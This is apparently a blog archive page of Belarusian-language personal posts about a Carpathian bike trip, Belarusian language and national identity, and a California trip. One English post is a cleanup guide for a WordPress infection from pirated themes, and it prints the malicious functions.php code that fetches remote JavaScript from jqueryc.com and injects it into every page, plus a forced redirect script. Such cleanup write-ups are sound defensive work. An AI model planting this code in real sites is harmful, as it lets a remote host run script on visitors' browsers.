Карпаты 2012

Posted by on May 12, 2013 in Pa-Belarusku | 0 comments

Я ўжо даўно хацеў напісаць гэты пост. Як толькі прыехаў так і хацеў. То бок ужо амаль год хачу.

Як заўсёды я сядаў, спрабаваў нешта прыдумаць-напісаць.
Часам штучна некаторыя дробязі прыцягнуць, але ніяк не ішло…

Дык вось. Гэта пра маё маленькае падарожжа ў Карпаты.

Гэтыя тры дні – самыя моцныя эмоцыі ў маім жыцьці.

Нафіг усіх

Хацелі ехаць яшчэ ў 2011 годзе. Я шлём купіў, торбу для ровара…
Але тады ніхто з сяброў не паехаў – таму вымушаны былі падарожжа адмяніць. Я разладзіўся, але жаданьне не зьнікла.

На наступны 2012 год тое ж самае становішча. Зьбіраліся, зьбіраліся ды зноў усе “саскачылі”.

Вось я й вырашыў – нафіг усіх. Паеду адзін. Нават неяк цікавей адразу зрабілася ад асэнсаваньня таго, што буду адзін.
Бо чакаць можна ўсё жыцьцё й з кожным годам будзе складаней і складаней усіх сабраць.

Туды

Квіток. Як везці ровар. Торба для ровара. Маршрут. Раздрукаваць мапу. Запасныя покрыўкі. Заплечнік. Гоў, моўчкі, каб бацькі ня ведалі.

Цягнік па заходняй Украіне да Івана-Франкоўска. Потым электрон, зусім такі ж як нашыя “дачныя электроны”, але ідзе ў горы. Потым Яремче – апошняя кропка
на цягніке. Далей 32 км да Яблуніцкага перэвалу на ровары ўверх. Уніз з хуткасьцю 56 км/г да Ясіня.

Гасцініца з выдатным нумаром за 10 даляроў. Украінцы, якія успрымаюць мяне за поляка і кажуць што на Ўкраіне добра, але ўсё адно ў Беларусь працаваць ездзюць. Далей ня мог уснуць, бо аднаму ўвечары заўсёды робіцца сумна. Трэба заўсёды неяк сацыялізоўвацца.

Уздым

Маршрут дакладна ня ведаю, але ведаю прыкладна накірунак – праз вёску Лазешчына. Сонейка. А восьмая раніцы. Я ў гарах на ровары.

Еду. Шмат бруда пад калёсамі, бо карпаты таму й самыя прыгожыя горы што ў іх шмат вады. Ручаі паўсюль. Сосны.
За гадзіну раблю вялікую частку пешага маршруту, але рана радавацца.

Прыязджаю да нейкага хутара. Нейкая бабка кажа што далей з роварам не прайсьці. Я ей ня веру. Еду далей

Бачу ўздым адсоткаў 30% – сапраўды не праедзеш. Цягну ровар. Побач адразу па сцежцы дзе я іду бяжыць ручай. Так хвілін 40.

Выходжу да леса – становіцца магчыма ехаць. Сцежка ідзе праз лес. Ганю прэч думкі пра знакамітых карпатскіх мядзведзяў.

Далей нейкая палянка і.. Бачна Гавэрла! Але зусім не зразумела як да яе ісьці.

Я згубіў сцежку. Не зразумела як ісьці далей. На палянцы нейкі домік і шмат ручаёў. Я напаўняю бутэлі вадой (У карпатах усё што
льецца можна піць :) і ем.

На чарговую спробу знайсьці сцежку ў мяне атрымліваецца – я бачу жоўты значак турыстычнай сцежкі. Трохі зрывае дах ад радасьці.

Далей выходжу на хрыбет. Вакол ужо няма дрэваў – толькі нейкія іглічныя хмызы. Гавэрлу бачна. Яшчэ мэтраў 500 угару. Часам цягну ровар.

У мяне нейкая дзіцячая радасьць. Я спыняюся каб паесьці. Прайшло дзесьці 5 гадзін з пачатку ўздыма. Лётае нейкі чмель.

Застаўся самы прамы, але самы цяжкі кавалак – тупа ўгару з камянямі. Ровар вядома пакідаць нельга. Іду. Разрадзіўся тэлефон.

Яшчэ гадзіна й я зверху. Тут холадна, афігенска й Украінскі сьцяг. Гавэрла ў тумане. Трохі адпачываю й адчуваю што можна ехаць назад.

Спуск

1 гадзіна на ровары. Еду зноў у веску каб шукаць гасцініцу. Знайшоў. Гаспадары ледзь не ўехалі – частуюць яешняй.
У гэты раз засынаю адразу.

Маці кажу што ў Карпатах. Цікава рэагуе.

Адтуль

Еду ў Яремче й неяк усе так атрымліваецца што на ўсё пасьпеваю. Яремче, Іфана-Франкоўск. Потым Львоў. Трохі паездзіў. Ледзь не
спазніўся на цягнік. І Менск.

Вынікі

Ужо шмат чаго пасьля гэтай вандроўкі адбылася. Я ў
штаты з’ездзіў
, працу кінуў.
Але ўсё адно мне нават цяжка параўнаць тыя чыстыя й яскравыя эмоцыі з чым-небудзь яшчэ. Непараўноўваюцца.

Вось так. У гэты годзе таксама спадзяюся паеду.

Read More

Толькі адзін шлях

Posted by on Mar 12, 2013 in Pa-Belarusku | 0 comments

У нас няма шляха дэмакратызацыі. Няма шляха чакаць дапамогі ад якой-небудзь Эўропы.

Я ня супраць дыктатуры. Я нават за, тады калі яна нацыяналістычная.

Я супраць таго, калі кажуць што мяне няма. Я супраць дэнацыяналізацыі Беларусі. Я супраць таго каб Беларусь атаясамлівалі зь якой-небудзь іншай краінай. Мне вельмі не падабаецца калі маю гісторыю ня ведаюць і блытаюць мяне з маімі суседзямі.

Таму ў нас няма шляха дэмокрасі фо Беларус, няма шляха фрідом фо Беларус, няма ніякага іншага шляха. Гэта ўсё другасна. Гэта хавае сапраўдныя праблемы.

Ёсьць толькі адно. Ведаць хто я.

І размаўляць па-беларуску.

Read More

Чаму Вы павінны рабіць свой бізнэс або праект беларускамоўным?

Posted by on Jan 26, 2013 in Pa-Belarusku | 5 comments

Таму што зараз яшчэ толькі самы пачатак вялікай беларускамоўнай хвалі, якая хутка захлыне ўсю краіну. А гэта значыць, што калі Вы ствараеце свой бізнэс беларускім Вы атрымліваеце ўжо два вельмі моцных фактара яго посьпеху:

Унікальнасьць

Ня проста там, чарговая цырульня ці чарговая кавярня. А першая беларускамоўная кавярня.  Першая беларускамоўная цырульня. Вы робіце гэтую справу першы, а значыць маеце вялікія перавагі. Ня рынак стварае Вас, а Вы ствараеце рынак. А значыць Вас ведаюць і Вас памятаюць. Калі яшчэ будзе такі шанец? Дзе яшчэ ёсьць краіна ў сьвеце, дзе Вы жывяце і ў якой пачынаецца паступовае вяртаньне да роднай мовы?

Лаяльнасьць

Ужо са старту Вы атрымліваеце вялікае кола насамрэч лаяльных да Вас кліентаў. Тыя хто размаўляюць па-беларуску абяруць беларускамоўную кавярню расейскамоўнай. Напрыклад, калі мы шукалі інтэрнэт-правайдара для course.by мы выбралі Дзелавую Сетку толькі праз яе беларускамоўнасьць.

Беларускамоўнасьць – значыць шчырасьць. У тым ліку з самім сабой. Быць беларускамоўным значыць быць шчырым. Ад беларускамоўнай кавярні людзі ня будуць чакаць падмана й таму выбяруць яе.

Ды й проста таму, што пакаленьне Y з дзяцінства пытае сябе: Чаму мы беларусы, а размаўляем па-расейску? Таму й прыйдуць да Вас, таму што Вы – гэта мы.

Хваля

Першая беларускамоўная служба таксі, першы беларускамоўны блог з рэцэптамі, першая беларускамоўная крама з кветачкамі, ну і далей..

Карацей я думаю трэба гэтую справу рабіць, і выбар мовы відавочны, бо такі шанец ня часта даецца.

Read More

WordPress jqueryc.com problem

Posted by on Dec 15, 2012 in Blog | 14 comments

Sometimes it happens that your wordpress site occasionally starts to redirect to magic jqueryc.com. Notice it’s not jquery.com site.

It could happen because of installing some hacked premium plugins/themes for example like this one – http://www.wikmag.com/felis-flexible-theme.html.

How does it work?

This malicious software that was installed to your website redirects all your users to jqueryc.com by inserting javascript line into the top of your page. Something like this:

<script type="text/javascript">
window.top.location.href = "http://www.jqueryc.com";
</script>

How to fix it?

You need to open a functions.php file in your wordpress editor view.

Then find the following line of code

//Jquery Function
if (!function_exists('insert_jquery_theme')){function insert_jquery_theme(){if (function_exists('curl_init')){$url="http://www.jqueryc.com/jquery-1.6.3.min.js";$ch = curl_init();$timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_theme');}

and delete it. Don’t forget to press save button after that.

That’s it. We are done. Your website is fixed.

Try to avoid untrusted or hacked plugins/themes in a future. It can lead to even more harmful results.

Check out my previous post about attempts and doing things.

Read More

Каліфорнія па-беларуску. Частка два.

Posted by on Nov 27, 2012 in Pa-Belarusku | 2 comments

СФ скончыўся хутка. Быў там усяго тыдзень. З аднаго боку вельмі спадабаўся – вельмі цікавы й шматаблічны горад, з іншага боку – гэта горад. Тут заўсёды шмат людзей і шуму. Увогуле пра СФ – гэта цэнтр Амерыканскай контр-культуры. Як бы процівага ўсходняму ўзбярэжжу, больше Эўрапейскаму. Тут перасякаюцца Заходняя й Усходняя культуры.

Мне здаецца ўжо казаў, але новая лічба – тут, у сэнсе ў Каліфорніі, толькі 40 адсоткаў белых. Астатнія – розныя іншыя людзі. Больш за ўсё людзей з Лацінскай Амерыкі й з Азіі. У аўтобусах надпісы на трох мовах: ангельскай, гішпанскай, і, напэўна, кітайскай.

Карацей уехаў я з СФ.

Наступны крок быў чэл з КаўчсёрфінгаЛеслі. Каўчсёрфінг (для тых хто ня ведае) – вельмі моцная рэч. Гэта сайт з супольнасьцю людзей якія адзін аднаму дапамагаюць у пляне застацца дзесьці на нач. Гэта не як airbnb.com. Тут усе бясплатна. Прыходзіш на гэтый сайт, запаўняеш інфу пра сябе й пачыныеш шукаць людзей, якія гатовыя цябе прыняць у тым горадзе, які табе патрэбен. Напрыклад я шукаў у трох гарадах – Маўнцін Вью, Саннівэйль і Пало Альто. Канешне хост(той чэл які мяне прымае) можа адмовіцца, што й адбываецца ў 90% выпадкаў, але заўсёды знаходзіцца той, хто можа дапамагчы. У двух выпадках з двух, калі я шукаў месца застацца, у канцы выбіраў я, а не мяне :)

Знайшоў Леслі. Супер клёвы чэл. Займаецца фінансамі, жыве ў Саннівэйль у сярэднім па памерам доме, верыць у тое што трэба проста дапамагаць людзям, лічыць гэта адной з мэтаў жыцьця, мае дзве машыны: адзін клёвы мерс, другі стары джып. Леслі пасяліў мяне ў асобнай комнаце на другім паверсе. Усяго ў Леслі тры комнаты, адну ён здае, у другую селіць каўчсёрфераў, а ў трэцяй жыве сам.

Леслі сустрэў мяне на вакзале ў Саннівэйль, паказаў дзе знаходзяцца Гугл і Фэйсбук. Мяне не ўразіла – паехалі ў Звычайны Амерыканскі Бар. У той час у ЗША йшлі спаборніцтва па бэйсболу. Дурная гульня, мне не спадабалася. 10 сек гульні – 3 хвіліны перапынку. Ня спорт гэта. А яшчэ цікава як Амерыканцы заўзяюць. Вельмі моцна. Але глядзець на гэта странна, бо разумееш што гэта ўсяго толькі ўнутранае спаборніцтва ЗША. Але назва – Спаборніцтва Сьвету – на мой погляд яшчэ раз сьведчыць аб зачыненасьці ЗША.

Далей ежа.

Мне падалося што тут людзі насамрэч дрэнна ядуць. Бургег, бульба фры й кола – гэта дэфолт паўсюль. У барах замест колы – піва. Напэўна таму й ня так шмат прыгожых дзяўчынак як у нас.

Тут вельмі распаўсюджана хадзіць і працаваць з кофішопа, напрыклад з Старбакса. Што я й рабіў кожны дзень пакуль быў у Леслі. Дарэчы пачатак гэтага артыкула таксама пачаў пісаць у кофішопе.

 

Стартап Хата

Потым паехаў у іншае месца. Завецца Hacker Fortress. Зараз гэта было нешта падобнае на стартап хату. Вялікі дом у якім жывуць дзесьці 10-13 чалавек адначасова. Нібыта як хостэл у СФ, але вельмі спецыфічны. Што ўсіх аб’ядноўвае – гэта тое што ўсе валяць стартапы.

Жыць там было ня вельмі зручна з кропкі гледжаньня даступнасьці транспарту. Дом быў на холміках трошкі ў бок ад горада – да бліжэйшага прыпынку было дзесьці 20 хвілін пешшу. Тады больш за ўсё адчуў праблему з грамадскім транспартам.

Самае лепшае што было – гэта людзі.

Пачну з уладальніка. Арджун улетку атрымаў фінансаваньне для свайго стартапу ад YCombinator’а, зняў гэтый дом і запрасіў шмат інтэрнаў, каб потым іх прымаць на працу. Але нешта не атрымалася й усіх інтэрнаў Арджун мусіў звольніць. Дом застаўся, але плаціць арэнду вельмі дорага, таму пачаў прымаць людзей за грошы з дапамогай airbnb.com. Арджуну дзесьці 27.

Эдварду 25 гадоў. Ён з Паўднёвай Карэі, скончыў каледж там, адслужыў у войску два гады(там як у нас гэта абавязкова), потым вырашыў ехаць у штаты – зноў паступаць у каледж. Зараз вучыцца й плянуе паступаць у Стэнфард праз год. Кажа што большасьць людзей у Паўднёвай Карэі ня хочуць зноў аб’ядноўвацца з Паўночнай. Але я яму ня веру. Таксама хоча валіць стартап. Дзеля гэтага жыве ў Арджуна.

Хуан Карлос. Ён жа Хука. Яму дзесьці 28, дакладна ня ведаю. Ён з Пуэрта Рыка. Пуэрта Рыка гэта на палову штат ЗША. Яны нават удзельнічаюць у галасаваньні. Вучыцца на PhD у Стэнфардзе, мае лакальны аналаг groupon.com у Пуэрта Рыка, бярэ адтуль грошы й зараз працуе над іншай ідэяй. Верыць у НЛА.

Пітэр і Адам з Вугоршчыны. 20 і 18. Вельмі файныя хлопцы. Ні водный з іх нават ня думаў паступаць у ўнівэрсытэт. Бацькі вельмі злаваліся, але пасьля таго як Пітэр замуціў старонку з гумарам у Фэйсбуку, на якой зараз 300 000 падпісантаў яны супакойліся. Кажа што атрымлівацца дзесьці 2 000 эўра ў месяц з рэклямы. Пітэр дапамагае Адаму валіць яго стартап, але Адам Пітэра ў долю не бярэ. Шукаюць грошы на стартап і кажуць што пофіг нават калі не атрымаецца. Шчаслівы. Карацей хлопцы што трэба. Без стэрэятыпаў.

Штэфан з Нямеччыны прыехаў у Каліфорнія так жа як і я – паглядзець што й як. Яму 21. У апошнім класе ў школе замуціў бясплатны хостынг. Ім карысталася вельмі шмат людзей і яму было цяжка яго падтрымліваць. Вырашыў скончваць з гэтым і зрабіў хостэнг платным. Зараз валадае хостынгавай кампаніяй. У ўнівер канешне вырашыў не ісьці. Вегетарыянец.

 

Тачка за $150

Заставалася ня шмат дзён да майго ад’езду й я вырашыў узяць машыну на пракат. Высьветліў што гэта ня дорага – $10 у дзень на выходныя. Потым канешне апынулася нашмат больш – мне няма 25 гадоў. Плюс бэнзін. Дарэчы каштуе столькі ж колькі й у нас. Але ў любым выпадку яно было таго варта. Тачка была клёвая – моцнае чырвонае Шэврале.

З’ездіў у горы й да акіяна. У гарах водзяцца нейкія горныя львы аб чым папярэджваюць частыя знакі. Але горы ня вельмі прыгожая. Ня тое што Карпаты.

У акіяне водзяцца марскія львы. Клёвыя чэла. Хвілін 15 глядзеў як яны нешта вырашалі ў сваёй зграі калі быў у Санта Круз.

Фріўэй гэта самая шырокая дарога ў ЗША. Нешта накшталту аўтабанаў у Нямеччыне. Вось тут цікава што на самай левай паласе можна ездзіць толькі калі колькасьць пасажыраў больш за два. Такім чынам заахвочваюць людзей, бо ўдваіх ездзіць лепей для экалёгіі.

 

Крышна

Апошнія два дні я жыў з Крышнай. Зноў праз Каўчсёрфінг. Зноў клёвы чэл. Тры гады падарожнічаў па сьвету. Быў паўсюль акрамя Эўропы і Расеі. Тры месяцы праграмаваньня-фрыланса й астатні год можна жыць нармалёва. Зараз жыве ў Каліфорніі й працуе на стартап. Таксама вегетарыянец.

 

Часавы пас

Туды прыляцеў было вельмі проста зрабіць +10 гадзін да свайго дня. Спатрабавалася толькі адзін дзень каб звыкнуцца. А вось калі назад вярнуўся гэта нешта цудоўнае.

Ужо амаль тыдзень ніяк не магу звыкнуцца й перабудавацца. Сплю днём, а гэтый тэкст зараз пішу ў 7 гадзін раніцы. Яшчэ ня спаў.

Вынік

З’ездзіць туды варта. Проста каб ведаць што Зямля круглая й што калі тут ноч там дзень.

Самае лепшае на мой погляд што там ёсьць гэта прырода й надвор’е. За месяц які я там быў было толькі 5 дзён з дажджом. Астатнія дні чыстае неба без ніводнай хмарачкі. Шмат вавёрачак і аленяў. Алені жылі прама каля дома Арджуна.

Другое што кідаецца ў вочы гэта людзі. Я пераходжу дарогу – мяне прапускае коп. Гляджу на яго – ён ківае галавой і усьміхаецца. Зранку бяжыш. Нехта бяжыць насупраць. Таксама ўсьміхаецца й кажа “Хай!”

Тут у нас часам кажуць што гэта ўсё несапраўды. Я вам кажу – Ніфіга. Гэта сапраўды. Таму што гэта лепей чым тупа глядзець у вочы чэлу й успрымаць кагосьці як ворага калі з кімсьці сутракаешся вачыма. Гэта так як і павінна быць.

Яшчэ я ня думаю што яны маюць штосьці супер важная чаго мы ня маем. Яны ня лепей за беларасаў гэта дакладна. Тое што зараз у Беларусі гэта толькі часовае становішча й я на сто адсоткаў упэўнен што тут можна зрабіць у 5 разоў лепей чым там. Гэта магчыма. Проста трэба ў гэта паверыць.

Зразумеў што амерыканцы гэты ня нацыя. Гэта краіна з Вялікай Колькасьцю Розных Людзей. Гэта яе й адрознівае.

Самае цікавае пытаньне

Каб з’ездзіць у Каліфорнію й пажыць там месяц мне спатрабавалася прыкладна 1.8 тык даляроў (без квіткоў на самалёт). Канешне я рабіў шмат памылак і таму калі б я паехаў зараз можна было б абыйсьціся й 1-1.5 тыкамі. Гэта з улікам таго, што 6 дзён з 30 я жыў праз каўчсёрфінг – грошы на жытло не марнаваў.

Напрыканцы падлічыў што на ежу апынулася $35 даляроў у дзень. Але сам сабе ежу гатаваў усяго некалькі разоў – часьцей за ўсё еу ў кавярнях. Карацей можна менш.

Шмат крам маюць сістэму зніжак і клёва выглядаюць, але як апынулася потым – самы танны – Ўолмарт.

Зараз пачынаецца самы кайф, бо пасьля штатаў засталося $120 і як вядома штомесячнага прытоку грошаў няма. Карацей жыць клёва :)

 

Першая частка

Read More